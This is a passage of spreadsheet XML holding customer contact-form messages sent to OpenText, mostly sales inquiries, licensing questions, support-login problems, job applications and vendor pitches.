PS : Do you have any Bug bounty or Reward Program ? On [link removed] or any other Platform ? Or do you offer some swag?_x000D_
_x000D_
Warmly Regards,_x000D_
Hisham Mir_x000D_
</t>
  </si>
  <si>
    <t>Looking for a comprehensive solution for document management, intranet, Email management, data room, and instant messaging for a private equity corp with 50 employees and growing in 8 different locations. _x000D_
_x000D_
Would like to know what Open Text can offer and a rough estimate of cost. _x000D_
_x000D_
Thank you!_x000D_
Stacy</t>
  </si>
  <si>
    <t>please contact about the billing for fax2mail</t>
  </si>
  <si>
    <t xml:space="preserve">Customer # US01-303901    We never received an invoice at the end of July.  </t>
  </si>
  <si>
    <t>Interested in learning more about and seeing a demo of your WFM software.  Please contact me...thanks.</t>
  </si>
  <si>
    <t>I am interested in learning more about Documentum Supplier Exchange.  I found this on the EMC version of the Documetum website but was redirected to OpenText where I struggled to find equivalent information.  Is Supplier Exchange still offered?</t>
  </si>
  <si>
    <t>Orange County BCC has 11 departments using Open Text for their document management solution.  They have the usability and back up covered, but not one has a migration stradegy.  I am looking to see the exact software solution they are using and find out how to build upon what they have to meet today's electronic records best practices and statutes.</t>
  </si>
  <si>
    <t>We need a quote on cost for your software and details please.  Thanks!!</t>
  </si>
  <si>
    <t>i need help my phone is not working rite now. it not turn on it says "low battery" what that mena?</t>
  </si>
  <si>
    <t>Hi, I need a report of any trading partner that is connecting inbound from interconnects that are going to Target Corp. via GXS (in last 2 weeks). Please provide: _x000D_
a. id_x000D_
b. interconnect it came from_x000D_
c. date it was sent to Target_x000D_
_x000D_
thank you, -Greg</t>
  </si>
  <si>
    <t>We have a new product that we white label for our clients to then provide to their end customers.  We want to add document request and sharing capabilities so that our clients can request documents from their customers and their customers can upload the requested documents.</t>
  </si>
  <si>
    <t>Hi Team, _x000D_
_x000D_
I am preparing for '5-8056 - OpenText Certified Documentum Administrator Exam' (formerly E20-465) and Prerequisites for this course is _x000D_
successful completion of the 5-8055 - OpenText Certified Documentum Consultant Exam (formerly E10-110) Enterprise Content Management Exam. _x000D_
My query is - I have already did certification on (E10-110) which is formerly called for (5-8055), _x000D_
so will my E10-110 certificate be considered for 5-8056 as prerequisites or again I shall complete 5-8055 explicitly.</t>
  </si>
  <si>
    <t xml:space="preserve">I am a current EasyLink customer / user and I am interested in an updated cloud-fax solution for our medical practice. </t>
  </si>
  <si>
    <t>Hello, We noticed our contact info and logo on your webpage are incorrect. Could someone please reach out to me today by email so I can forward over our new Logo and number? Really hoping to have that done today if possible. Thank you so much!!</t>
  </si>
  <si>
    <t>I'm trying to look up a transmission from 8/2/2017. It's only letting me see 8/19-8/29/2017. Can't I search back any further?_x000D_
_x000D_
Thanks,_x000D_
Sandy</t>
  </si>
  <si>
    <t xml:space="preserve">Fax number was changed, not sure why. </t>
  </si>
  <si>
    <t>New account to OpenText and need access to downloads for AppXtender License Server 8.1 SP2</t>
  </si>
  <si>
    <t>We previously had an account with GXS through a lady called Anne Joiner who has now left our company, however we are not aware of the login and password details. Please can you advise how we can re-set these, so we can continue to have access.</t>
  </si>
  <si>
    <t xml:space="preserve">Four Points is less than a mile from your Lexington, Kentucky office.  I have stopped by your Lexington office a couple of times to offer our services, but I can't reach anyone.  Can you tell me who books hotel rooms and/or meeting space in the area?  We would love to offer you a special negotiated rate._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Jessica Mack_x000D_
</t>
  </si>
  <si>
    <t>Di.Tech is an EDI Provider. Actually we're managing a lot of interconnect processes among our customers and yours. Defining a standard strategy, i.e in terms of protocol used, AS/2 or X.400 could be an useful optimization for both our companies. I'd like to have a contact with a representative of your organization just to try to define this standard approach._x000D_
Thank you for your collaboration _x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>On Sunday I got email from OpenText Connect to finish my online support registration.  When I try to do it, it asks for me to set my new password and then fails with "Error Occurred Updating Password"</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren, _x000D_
ich möchte mich kurz vorstellen: _x000D_
mein Name ist Manuela Simons und ich studiere an der Hochschule Bonn Rhein Informatik. _x000D_
Aktuell schreibe ich, in Zusammenarbeit mit dem Unternehmen ACCSO (Accelerated Solutions) GmbH, an meiner Bachelor-These._x000D_
Thema ist die Auswahl einer geeigneten Open Source BI-Reporting Lösungen.  _x000D_
Ich habe herausgefunden, dass Actuate an der Entwicklung von BIRT beteiligt war und von Ihnen nun gesponsert wird. _x000D_
Deswegen würde ich mich sehr freuen, wenn Sie mir für meine Auswertung folgende Daten bezüglich BIRT nennen könnten:_x000D_
-	Anzahl Kunden_x000D_
-	Anzahl Referenzkunden_x000D_
-	Anzahl Installationen_x000D_
-	Anzahl (named) User_x000D_
-	Anzahl Partnerunternehmen_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Manuela Simons_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Interesting in knowing OpenText Solutions for integration with O365. </t>
  </si>
  <si>
    <t>We use xPression.  Lately I received some emails from OpenText regarding how support are to be handled.  I just try to figure what I have to do to make everything run smooth and easy next time we need support.  How can I connect my new OpenText account to the xPression account we have?  How can I become a group administrator for Storebrand in "My Support".  Shall I at all use "My Support" for xPression support?</t>
  </si>
  <si>
    <t>We would like to get OCR,ICR,OMR service.</t>
  </si>
  <si>
    <t>pricing and information on faxes to email</t>
  </si>
  <si>
    <t>Not able to access "my support"</t>
  </si>
  <si>
    <t>Hi Open Text team,_x000D_
Our client is a building the new VDI (Virtual Desktop Infrastructure) environment base on Vmware Horizon solution. There is "Master Golden Image" created - OS Windows 7 Pro with pre-installed required software, from this image is provisioned ~30 Virtual Desktop Machines. _x000D_
_x000D_
The Client has a purchased software Open Text Socks Client version 14 with 14x licenses._x000D_
The Open Text Socks Client will part of Golden Image for this 30 virtual desktop machines_x000D_
and it will be used and configured only within the limit of those 14x product licenses._x000D_
_x000D_
Is it align with the software licensing policy for Open Text Socks client?_x000D_
What are the licensing requirement for Open Text Socks Client in VDI enviroment?_x000D_
_x000D_
Please let me know._x000D_
Thank you for your support.</t>
  </si>
  <si>
    <t>Hi, I am Arun Siddharthan and I manage NextGen alliances for Mphasis. We're a $1 billion IT systems integrator. We have an established team comprising of over 100 trained resources who work on OpenText products. We've completed over a 100 projects using OpenText products. We're interested in pursuing a partnership with OpenText for giving better value to our customers._x000D_
_x000D_
Please let me know how we to proceed with this partnership pursuit._x000D_
_x000D_
Regards,_x000D_
Arun</t>
  </si>
  <si>
    <t>Request access to My Support as I'm the person responsible for Opentext installation in my company. Customer number 1006508 - SEAT S.A.</t>
  </si>
  <si>
    <t>Looking for ball park figures for cost per user for 2500 users on a SaaS basis for OpenText Content Suite Platform. _x000D_
_x000D_
Would also like to know if/how well the product can integrate with Google Mail/Google Drive/Google Docs and which scanning solutions you partner with or if you provide your own._x000D_
_x000D_
Kind Regards_x000D_
_x000D_
Claire Unwin-Reed_x000D_
Business Architect _x000D_
University of Portsmouth</t>
  </si>
  <si>
    <t>Taunton Municipal Lighting Plant, a municipal power agency located in Taunton, Massachusetts, is looking to procure and install an archiving solution for our ERP system (currently SAP ECC 6.0) as well as a very large volume of paper documents. This is an approved project for late 2017/early 2018. We have an RFP we are sending out to prospective vendors and would just like to know the proper physical mailing address and email address we should send this RFP to. Please contact me with this information either at 508-824-3147 or dmelanson@tmlp.com. Thank you in advance.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am working for Aerow company (France - Paris). Please could you update my account to access my support._x000D_
Regards,_x000D_
Laurent Colucci</t>
  </si>
  <si>
    <t xml:space="preserve">    I am a user of cordys product. I can not find where I can monitor the health of the services hosted on ESB in Cordys. Where I can quickly check the health of the services hosted on ESB in a dashboard view and drill down to specifics for any component?_x000D_
Can you help me?</t>
  </si>
  <si>
    <t>Ladies and Gentlemen_x000D_
We hereby terminate the service according to the invoice no. 053881 (customer number 658587) to the next possible date._x000D_
_x000D_
Thank you for your confirmation._x000D_
_x000D_
With kind regards_x000D_
Mirjam Oertig</t>
  </si>
  <si>
    <t>Want to know about opening in Software Testing profile</t>
  </si>
  <si>
    <t>I need a Product Activation Key._x000D_
Could you please email that to me as soon as possible?_x000D_
Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Neu-Einführung DAM-System </t>
  </si>
  <si>
    <t>RFI for Enterprise Service bus - urgent enquire /reminder for sales contact for Germany</t>
  </si>
  <si>
    <t>Hello,_x000D_
The IT department had to change the ip address of the LASCOM server._x000D_
The BRAVA visualizations no longer work._x000D_
_x000D_
The server ARSR0104: 10.13.128.17 (LASCOM server) had previously the address: 10.13.176.16_x000D_
_x000D_
Could you send us a license file for this change, as well as the installation procedure?_x000D_
_x000D_
Thanks in advance,_x000D_
Fabrice JORIS._x000D_
VALLOUREC</t>
  </si>
  <si>
    <t>I changed my email address and can no longer access support content.</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
my name is Gallo Mauro, i am a sysadmin for italian "Arma dei Carabinieri" company._x000D_
My company over 10 years ago, bought "Hummingbird" software use licences._x000D_
I found in many ours server "Opentext 5.3" installed. The hummingbird product code license is validated by opentext 5.3 also. Can you say me if the Arma dei Carabinieri can use it? If we can use it, how many installation can we do?_x000D_
_x000D_
thank you in advance,_x000D_
regards</t>
  </si>
  <si>
    <t>I cannot access knowledge centre anymore_x000D_
https://knowledge.opentext.com/knowledge/llisapi.dll/wiki/18998977/PMQL%20Samples_x000D_
Please assist.</t>
  </si>
  <si>
    <t>Greens is currently looking for a more automated and sophisticated invoice scanning solution so as to move away from the manual paper-based process we have today.</t>
  </si>
  <si>
    <t>We are looking for a document management system for our small firm. 1-15 users.  Thank you, Patrick</t>
  </si>
  <si>
    <t xml:space="preserve">Hello:_x000D_
We are not able to pull up document no. RGM162671 (for goods returned by Best Buy) for Easylink.  It is showing up on the reports section but not on the document search where we can gets the document details._x000D_
Please assist us on this issue._x000D_
Thanks,_x000D_
Joyce Serapio_x000D_
Performance Designed Products_x000D_
</t>
  </si>
  <si>
    <t>I e-mailed your company two days ago, haven't gotten a reply yet.  The problem is with my RoadMate 9612T-LM.  When I'm driving and I'm going West the map shows that I'm going East and viseversa.</t>
  </si>
  <si>
    <t>Hi, I need to open two new tickets with HP Extream support</t>
  </si>
  <si>
    <t>This is Eric from TL Care, Inc, one of the vendors of Kohl's. I am writing to enquire about your UPC catalog service. _x000D_
_x000D_
I would appreciate it if you could answer me the following questions:_x000D_
1. How much does it cost to register an account with the UPC catalog service? And is the total cost fixed?_x000D_
_x000D_
2. How do we register an UPC Catalog Account as a vendor of Kohl's? Anything special? And what information do we need to provide to register an account?_x000D_
_x000D_
3. Are you going to help us to set up the UPC catalog after we register and provide you our product datas (including UPCs), or we have to do it ourselves?_x000D_
_x000D_
4. (About) how long will it take to get everything done , from setting up an account to accessing our UPC data by Kohl's?_x000D_
_x000D_
I am looking forward to hearing from you soon. _x000D_
_x000D_
Thank you._x000D_
_x000D_
Sincerely,_x000D_
Eric Liu</t>
  </si>
  <si>
    <t>Hello there i would like to purcase enterprice content management software ... will u guide me to gove me the agent ... where i submit the propsal _x000D_
Thanks_x000D_
Adnan</t>
  </si>
  <si>
    <t>Need access to train in Magellan. Work for open text and studying towards Certified Predictive Analytics and would like to learn/apply that to Magellan.</t>
  </si>
  <si>
    <t>RightFax integration with NextGen Software &amp; Konica Minolta MFPs</t>
  </si>
  <si>
    <t>I am looking for a quote for a very small office with just two lawyers and a means to share information. Any information would be helpful.  Also, is there any problem with mac users and the program that you offer? Thanks.</t>
  </si>
  <si>
    <t>I need information on Teleform, for a client of mine</t>
  </si>
  <si>
    <t xml:space="preserve">A colleague and I are tasked with exploring AI solutions for our media marketing planning and strategy team. We're trying to see what tools are out there and what they could possibly provide for our planning and strategy. Capabilities would include using consumer data to create an optimal media plan or strategy. something that tracks and translates consumer behavior and adopts plans based on these behaviors, creates customer profiles, and/or chooses top channels for advertising. Since there are two of us involved in this, we'd like to connect via email or hop on a conference call to learn more. _x000D_
_x000D_
We look forward to hearing from you. Thanks!_x000D_
</t>
  </si>
  <si>
    <t>Looking to move to Rightfax Cloud</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in obtaining email database of Construction Project Management Software Users?_x000D_
_x000D_
This list Contains Company name, Web address ,Contact name, Phone number, Email address, Title, physical address, City, State ,Zip Code, Country, Phone number, Fax Number, Employee size and last verified date._x000D_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</si>
  <si>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I am trying to post invoice 08010041708 (EasyLink) to pay and we don't have the remittance address listed in our system. Could someone please send a W-9 so I can get this address set up in our account and pay the invoice? Please send to accounts.payable@versoco.com. Thank you!</t>
  </si>
  <si>
    <t>We are exploring the options of outsourcing our EDI needs, and wanted to see if OpenText might be a possibly partner to consider.  Can you please send me some information and/or have  somebody contact me at their earliest convenience?  Thanks.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I want to register for the course (2-4912 Entity Modeling for Process Platform v16), could you tell me please should I pay for it or it is free for opentext employees?_x000D_
_x000D_
Regards, Kristina.</t>
  </si>
  <si>
    <t xml:space="preserve">Customer Communications Management CCM </t>
  </si>
  <si>
    <t>Projekt - Migration Archivdaten - Projekt E-Mail Archivierung</t>
  </si>
  <si>
    <t>Interested in seeing how open text can help us with archiving records from SharePoint 2013, O365, Exchange and other home grown   Enterprise Content Management tools</t>
  </si>
  <si>
    <t>Would like to learn more about your ECM, ITSM and FSM capabilities that you might have available.</t>
  </si>
  <si>
    <t>I would like to set up Fax2Mail.</t>
  </si>
  <si>
    <t>Evaluation of services to replace prior vendor.</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo,_x000D_
_x000D_
ich bin interessiert am Produkt Content Analytics und würde mich über einen kurzen Anruf freuen._x000D_
_x000D_
Viele Grüße_x000D_
Holger Düwiger_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am interested in becoming certified for Vendor Invoice Management. I have been working with VIM for almost a year. I was just wondering if you are obliged to follow the bootcamp in order to be able to participate for the exam._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Nicolas Neirinck</t>
  </si>
  <si>
    <t xml:space="preserve">I write because I cannot open my mails. Can you please help me?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi, I am K. Chandra sekhar with hands on 2.5 years experience in wordpress, javascript, jquery, mysql, php, bootstrap, material design, html5, css3 In Aptagrim Consulting LLP Hyderabad.</t>
  </si>
  <si>
    <t>My account can't access resources</t>
  </si>
  <si>
    <t>Says an error occurred when updating password even though password was indicated as "strong".  Can you help with this problem?</t>
  </si>
  <si>
    <t>Sanaari one Of Leading IT Company, Sanaari Provide Services 1) Corporate Training, Corporate Online Training, Corporate virtual Training and Staff On consulting for IT Positions._x000D_
_x000D_
If you have any kind of Corporate Training Requirement feel free to contact us at: shivkumar@sanaari.net_x000D_
_x000D_
www.sanaari.net_x000D_
Mobile: 99497 14567</t>
  </si>
  <si>
    <t>Need to PMC code for TD7.0 .All ready have licensed version of TD6.1</t>
  </si>
  <si>
    <t>Hi, _x000D_
We are currently upgrading our system to  Gupta Team Developer 6.1. And are unable to register it with our PAC or MAC code. We enter the code and the response is "Product is successfully upgraded" but next time we start Team Developer the warning "Test Drive Reminder" shows, and explains that we have to Upgrade._x000D_
Please contact us so we can resolve this._x000D_
Best Regards_x000D_
/Tomas Martinsson</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, we just bought the license for Brava Desktop CXL 16.2, we want to download the software and the license, but all the time the systema ask for account confirmation, I've done this twice, but anytime i try to log in, always get the same answer:_x000D_
_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We wanted to buy the following,EXCEED 15 (open text exceed)  Please let us know how we can buy it and make payment in more detail.Please send us your reply to our mail kakariaris@gmail.com</t>
  </si>
  <si>
    <t>Hi !!_x000D_
I'm Arya placement coordinator of BITM._x000D_
Purpose of contact is Campus recruitment, want to know any opportunities for this year for our college_x000D_
Hope you will revert me back _x000D_
Regards</t>
  </si>
  <si>
    <t>I'm looking for training options to get my project people trained in Hummingbird. Can you share the details of the same please? Thanks_x000D_
_x000D_
Alternate Email Contact - tarun.verma@accenture.com</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
My name's Gallo Mauro and i am a sysadmin for an italian institunctional company "Arma dei Carabinieri"._x000D_
I have found in our servers many installations of your "Opentext 5.3" software ._x000D_
I know that my company has bought "hummingbird" licenses in past (ours key is 17 7500 001 00055974). The same key also work for opentext._x000D_
Has my company bought some licensing for opentext 5.3 in past also?_x000D_
Are we autorized to use your "opentext 5.3" software? How many installations can we put into ours systems?_x000D_
_x000D_
Thanks in advance,_x000D_
best regards</t>
  </si>
  <si>
    <t>Unable to set password for the account.</t>
  </si>
  <si>
    <t>In need of a distributor I can use to sell OpenText to client._x000D_
_x000D_
* 2 Servers - 10 channels each_x000D_
* PDF Module and Searchable PDF Module_x000D_
* FoIP Enable an existing RightFax Document Delivery Channel_x000D_
* 60 x RightFax Connector for Konica Minolta MFD._x000D_
_x000D_
Please use e-mail</t>
  </si>
  <si>
    <t xml:space="preserve">Education </t>
  </si>
  <si>
    <t>tryna getting booking fast</t>
  </si>
  <si>
    <t>I'm intrested in a teleform licence</t>
  </si>
  <si>
    <t xml:space="preserve">I saw a role opening for a Business Value Architect which unfortunately only caught my eye after the submission date was over. I would like to still apply for it if possible as I see a very strong fit between the requirement and my experience. I would appreciate if you can please put me in touch with the hiring manager/talent acquisition team in Dubai so I can pick this up with them. </t>
  </si>
  <si>
    <t>Please share with us with your references in Qatar</t>
  </si>
  <si>
    <t xml:space="preserve">School _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Aquisição da licença do OpenText Brava! DWG Viewer </t>
  </si>
  <si>
    <t>B2b messaging platform/easylink</t>
  </si>
  <si>
    <t>I'm interested in learning more about the licensing of OpenText Exstream.  I have been developing in Exstream (Dialogue) for more than 10 years now, and have had a lot of experience using the different functionalities that it has to offer.   I'm looking into the possibility of starting a business that offers my services using Exstream.  I know that obtaining these licenses can be very costly and was wondering if Opentext would be willing to give a trial license of a variety of Exstream modules that I could demo to my potential customers?</t>
  </si>
  <si>
    <t>for formating and dizajn text book</t>
  </si>
  <si>
    <t>Immediately Available for the Talent Acquisition post</t>
  </si>
  <si>
    <t>I had completed BE computer engineering.I want to work in your company.if there is any vacancy in ur company then inform me .....i am looking positive response from you..._x000D_
_x000D_
thank you_x000D_
Ranjeet Keshari</t>
  </si>
  <si>
    <t>Interested in EDI solutions / services</t>
  </si>
  <si>
    <t>I have not received a call back yet in regards to this product.</t>
  </si>
  <si>
    <t>eeking document management/record retention/workflow automation solution_x000D_
Data capture and extraction to LOB apps _x000D_
_x000D_
Nonprofit with 450 employees, 7 ops departments with 20+ programs and 40+ physical locations_x000D_
Programs are diverse and have their own unique LOB - programs include WIC, Headstart, Fuel Assistance, Weatherization, Senior Housing, Workforce Development</t>
  </si>
  <si>
    <t>We would like to add an additional area of HomeServices of America into our existing contract; however, we want their information to appear separately on billing.  (Account 862810)  Thank you.</t>
  </si>
  <si>
    <t>We are currently evaluating BPM systems and I'm looking to have a direct discussion to discuss our requirements and system capabilities.</t>
  </si>
  <si>
    <t>I would like to obtain a free development license/trial version of Magellan to evaluate it's suitability for my organization.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to work in the QA site and all I'm getting is a white page and a spinny thing. It has been like this for about 30 minutes. When will this be resolved? </t>
  </si>
  <si>
    <t>Prezados Srs (as),_x000D_
Venho por meio deste, me apresentar:_x000D_
Sou a Alinne representante da EYE ENGENHARIA._x000D_
Nossa empresa é especializada em projetos executivos de pequeno, médio e grande porte, obras publicas, atuando desde 2007, reformas de instalações elétricas, estudos de luminotecnia, hidráulica, automação, produção de documentação técnica, cotações e levantamento de materiais, projetos de cabines primárias e quadros elétricos, rede e telefonia entre outros serviços oferecidos pela nossa empresa._x000D_
Gostaria de estar enviando nosso portfólio para uma análise, parceria e/ou fazer parte do seu escopo de fornecedores._x000D_
Teria algum e-mail especifico para estar enviando?_x000D_
Ficarei à disposição para quaisquer esclarecimentos._x000D_
_x000D_
Cordialmente,_x000D_
Alinne Vieira.</t>
  </si>
  <si>
    <t>Request a quote and more information about Documentum for BART application.</t>
  </si>
  <si>
    <t>Hi,  I need to speak to someone about a Utility Sector opportunity in Melbourne.  Could someone contact me urgently?  Thanks</t>
  </si>
  <si>
    <t>Need to get a quote for records management software (5015.2 Chapter 2-4 compliant RMA)._x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Request to be added to your PR mailing list._x000D_
_x000D_
Hello,_x000D_
_x000D_
I am the News Editor for Keypoint Intelligence/InfoTrends.  Keypoint Intelligence is a worldwide market research and strategic consulting firm for the imaging, document solutions, production print, and digital media industries. We provide insights and advice to help clients understand market trends, identify opportunities, and grow their business.  _x000D_
_x000D_
Could you add articles@infotrends.com to your press release distribution list so that I can cover your news on our News Service?  Our News service is available to our clients in the imaging, document solutions, production print, and digital media industries worldwide. _x000D_
_x000D_
Please use the articles@infotrends.com address so that your news will be covered by our news regardless of who is editing that day.  _x000D_
_x000D_
Could you also send me a confirmation when we are added to the PR list.  Thank you so much for your help with this._x000D_
_x000D_
Thank you,_x000D_
Bridget Dedian_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We didn't get the TD Mobile version 2.1, could you please send us the download link. Thanks in Advance.</t>
  </si>
  <si>
    <t>We are looking for a BI/AI platform to either integrate to or embed in our ERP/CRM application. We have a short window to make this decision.</t>
  </si>
  <si>
    <t xml:space="preserve">My hp desktop 260-p026 has a message when I turn on stating boot device not found. </t>
  </si>
  <si>
    <t xml:space="preserve">No contact yet for this email._x000D_
_x000D_
Afternoon Kirk,_x000D_
I got your name from the customer service team as I have a functionality question._x000D_
_x000D_
Can the software compare multi-page pdf’s?  We convert our CAD drawings into pdf’s and they are typically multi-page.  I am trying on a downloaded evaluation copy and cant seem to be able to figure it out, or find any reference documentation on the topic.  I am sure I am missing it somewhere._x000D_
</t>
  </si>
  <si>
    <t>Interested in learning more about your Enterprise Information Management System</t>
  </si>
  <si>
    <t>We are existing AXS-One customer.  I am interested in understanding what options are for integrating AXS-One with Office 365.</t>
  </si>
  <si>
    <t>I'd like to set up a discovery call about your DAM offering.</t>
  </si>
  <si>
    <t>I need access to mysupport.</t>
  </si>
  <si>
    <t>Hello,_x000D_
We need to set up the OpenText Active Catalogue with our company Olivina. Please let us know the steps to setting that up._x000D_
_x000D_
Thanks,_x000D_
Kendra</t>
  </si>
  <si>
    <t>I am a Capgemini Employee, I work for the account of our client VEOLIA using  EXSTREAM solutions (OT Exstream, afp viewer, afp modify, maimerge, pdfcompare...) and I would like to know how may I access to OT support? _x000D_
_x000D_
Thank you in advance_x000D_
_x000D_
Best regards</t>
  </si>
  <si>
    <t>I'd like to schedule a demo to see opentext's ECM capabilities. We are in the midst of evaluating ECM providers for our internal legal team, which operates around the world._x000D_
_x000D_
Best,_x000D_
Reuben</t>
  </si>
  <si>
    <t>We have Xpresssion Enterprise Edition v4.1 installed and I'd like to know if the software has the capability to translate documents to foreign languages.</t>
  </si>
  <si>
    <t>Hello,_x000D_
it is possible to download your "Free DWG Viewer"?_x000D_
I get no download link from you._x000D_
Thank you</t>
  </si>
  <si>
    <t>My Support is not working (Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us.)</t>
  </si>
  <si>
    <t>Access knowledge.opentext.com_x000D_
when i try to access knowledge center i get the message: We're sorry, your account does not grant you access to this resource._x000D_
can you help me?</t>
  </si>
  <si>
    <t xml:space="preserve">On behalf of LFS Consulting I would kindly ask you to provide me by Return e-mail with a sales contact, who can initiate a dialogue regarding a dedicated solution for ESB License._x000D_
_x000D_
Thanks in advance_x000D_
_x000D_
Regards_x000D_
_x000D_
_x000D_
Mariana Grozeva_x000D_
Consultant_x000D_
extern.grozeva@lfs-consulting.de_x000D_
+4748042481_x000D_
_x000D_
http://lfs-consulting.de/_x000D_
</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
Please provide me with the contact details of our account manager. _x000D_
_x000D_
Thanks in advance_x000D_
_x000D_
Regards_x000D_
_x000D_
Joris</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, could someone please contact me via asidukov@gmail.com, I would like to report severe security vulnerability on your website. </t>
  </si>
  <si>
    <t>Bonjour,_x000D_
 _x000D_
Je suis Natalie Cops et je souhaite vous proposer un partenariat sur de la création de contenu/le Marketing Internet, avec l’entreprise que je représente à l’ile Maurice ; Rosemees Company Ltd._x000D_
Nous proposons depuis plus de 5 ans différentes solutions internet, mais excellons dans le domaine de la rédaction et de la traduction web ainsi que la création de trafic._x000D_
Nous travaillons actuellement en différentes langues incluant le Français, l’Anglais, l’Espagnol et l’Allemand._x000D_
 _x000D_
Nos quatre plateformes opérantes se trouvent à l’Ile Maurice, Madagascar, en Inde et en Argentine et sommes donc en mesure de vous faire économiser entre 40-60% sur les ressources humaines._x000D_
 _x000D_
CE QUE NOUS PROPOSONS EN CE MOMENT (liste non exhaustive):_x000D_
 _x000D_
Gestion de contenu – Web rédaction_x000D_
 _x000D_
Article unique pour vos rédactions de presse (Prix promotionnel à la demande)_x000D_
 _x000D_
Référencement SEO_x000D_
Community Management_x000D_
Création de site Web_x000D_
Animation 3D_x000D_
Rédaction Thématique_x000D_
Traduction_x000D_
Coaching_x000D_
Web Rédaction_x000D_
Modération_x000D_
Marketing Internet_x000D_
Création de Trafic_x000D_
E-commerce_x000D_
Création et gestion de contenu_x000D_
Accueil Téléphonique_x000D_
Affiliation Internet_x000D_
Animation d’Espace Publicitaire_x000D_
 _x000D_
POURQUOI NOUS CONTACTER ?_x000D_
 _x000D_
Nous proposons des articles test GRATUITS pour que vous puissiez évaluer le niveau du rédacteur souhaité._x000D_
Nous travaillons sur les régions de la France ainsi que celles des pays Francophones et Anglophones. Notre proximité face à ces cultures rend notre connaissance beaucoup plus riche comparée à d’autres régions Francophones.  _x000D_
Notre centre est opérationnel 24 HEURES SUR 24, 7 JOURS SUR 7_x000D_
Notre panel de services est étendu pour satisfaire au mieux vos besoins_x000D_
._x000D_
ILS NOUS ONT FAIT CONFIANCE :_x000D_
Nous travaillons déjà avec les plus grands opérateurs médiatiques Anglophones et Francophones, alors pourquoi ne pas vous en faire profiter aussi. Nous pouvons mettre à votre service nos compétences, mais aussi nos expériences en plusieurs domaines mentionnés. (Pour une raison de</t>
  </si>
  <si>
    <t>unable to access anything in knowledge center</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I would like to enquire about the current solutions you have to automate and streamline my business processes._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">We looked at HP/Exstream about 5 years ago as an option to replace our old DocuMerge system for policy printing. We liked what we saw but instead chose to go with a print solution from our Policy Admin vendor. That hasn't worked out well and we’re now looking for a better option from companies that are focused on content generation._x000D_
_x000D_
I would like to hear how Exstream has evolved over the last few years, and talk about how it might work for our policy printing. </t>
  </si>
  <si>
    <t>Hi!_x000D_
_x000D_
I just heard of Exceed TurboX today! I'm looking forward to learning more._x000D_
_x000D_
I have a few questions and I'd be interested to know if your product may offer the solution I'm looking for. Briefly:_x000D_
_x000D_
- Can I connect from a macOS Sierra retina display client to a local OpenVZ Linux container (running under a VM on that same Mac)? Same question goes for the case where the container is remote._x000D_
_x000D_
- Is it possible to fully and completely support the retina resolution level? So that, for example, from the perspective of the connecting macOS host, I see the "remote" xterm has a small window with retina-sized fonts. What I've seen when I've used XQuartz, even locally, is a minimum "pixel" of 2x2 actual retina pixels._x000D_
_x000D_
- Is it possible to use a floating-window rootless/headless setup when connecting from a native macOS client (to the Linux Debian 7 container)? I'd like to have windows in Linux integrated with macOS - either managed fully by macOS's "window manager" or to be able to choose my own Linux-X11-specific window manager as applicable. The key thing I'm looking for here is the headless or rootless mode. If this is not currently possible, what about in the horizon?_x000D_
_x000D_
- What about the future for letting the desktop client share a session? Can I grant someone I delegate to have view-only access to an existing session I'm running from? Could I use a native macOS client for this?_x000D_
_x000D_
- Is there a comparison page again xpra or nx protocols? For interactive content, how does it compare to a H.264 stream?_x000D_
_x000D_
Any feedback here would be appreciated.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
My name is Kristin Wooles, I’m the Marketing Communications Coordinator at Tru-Test Group. We’re currently working on a project to replace our current Tru-Test Group Marketing Support Site with a marketing media library system. The Marketing Support Site is our tool which stores product information, service information, imagery, logos, and other assets. _x000D_
Right now I’m in the initial stages of vendor research and would love to learn more about OpenText’s product. I’ve had previous experience using Documentum and would like to learn about the change from Documentum to OpenText._x000D_
Could you please provide me with an indication of price and any generic marketing information you have to support your product? As we’re working to a timeframe (complete the build by end of 2017 and launch in February 2018), I’d really appreciate it if you could send this to me by Thursday August 31st._x000D_
_x000D_
Kind regards,_x000D_
Kristin</t>
  </si>
  <si>
    <t>We are looking to implement a Document Management system, and would like to know how Open Text compares to other offerings</t>
  </si>
  <si>
    <t>CoStar Group currently uses RightFax and has on-site hardware. We are potentially looking into a cloud-based solution that would free up extensions from our phone system._x000D_
Our RightFax usage is mainly receiving faxes rather than sending out faxes (we receive about 99 faxes for every fax we send out)._x000D_
Ballpark company numbers: around 170 users that have send/receive 30,000 faxes in a year._x000D_
Please feel free to contact me anytime between 10am-4pm EST on business days.</t>
  </si>
  <si>
    <t>Please send me a sales contact information to submit an RFP for electronic filing services request from our company.</t>
  </si>
  <si>
    <t xml:space="preserve">Where can I find the SKUs for the different products OpenText offers?   </t>
  </si>
  <si>
    <t>I am looking for an RMS for our global archives.  Desired features include the ability to upload legacy data to track and manage current onsite and third party inventory, assign record type and apply retention schedule, add and edit metadata, schedule destruction, include electronic records in database, be hosted/cloud-based and single sign-on.</t>
  </si>
  <si>
